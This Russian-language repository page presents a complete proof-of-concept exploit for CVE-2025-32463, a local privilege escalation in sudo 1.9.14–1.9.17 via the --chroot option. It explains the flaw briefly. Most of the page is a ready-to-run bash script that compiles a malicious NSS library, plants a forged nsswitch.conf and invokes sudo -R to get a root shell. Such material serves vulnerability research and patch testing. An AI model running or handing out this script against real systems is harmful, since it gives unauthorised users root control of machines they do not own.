
Эксплойт, подтверждающий концепцию, для CVE-2025-32463 — локальное повышение привилегий в sudo 1.9.14-1.9.17 через неправильную конфигурацию chroot и внедрение вредоносной библиотеки NSS.
--chroot локальное повышение привилегийExploitDB ID: 52352
Этот репозиторий документирует критическую уязвимость локального повышения привилегий (LPE), затрагивающую версии Sudo 1.9.14 – 1.9.17.
Уязвимость вызвана неправильной реализацией опции sudo -R (--chroot) и позволяет атакующему выполнять команды с правами root, даже если это не разрешено в файле sudoers.
🔥 Результат: Неавторизованный пользователь → root shell
Параметр --chroot (-R) в sudo позволяет пользователю выполнять команды в указанном им корневом каталоге.
Однако в результате изменения, внесённого в sudo 1.9.14:
sudoers ещё не полностью проверенchroot() выполняется по указанному пользователем каталогуЭто позволяет атакующему с помощью поддельного файла:
/etc/nsswitch.conf
загрузить вредоносную библиотеку NSS (libnss_*.so) с правами root.
nsswitch.confsudo -R <dir> <command>⚠️ Используйте только в учебных и тестовых средах
#!/bin/bash
# sudo-chwoot.sh – PoC for CVE-2025-32463
set -e
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd "$STAGE"
cat > woot1337.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor))
void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/bash","/bin/bash",NULL);
}
EOF
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
sudo -R woot woot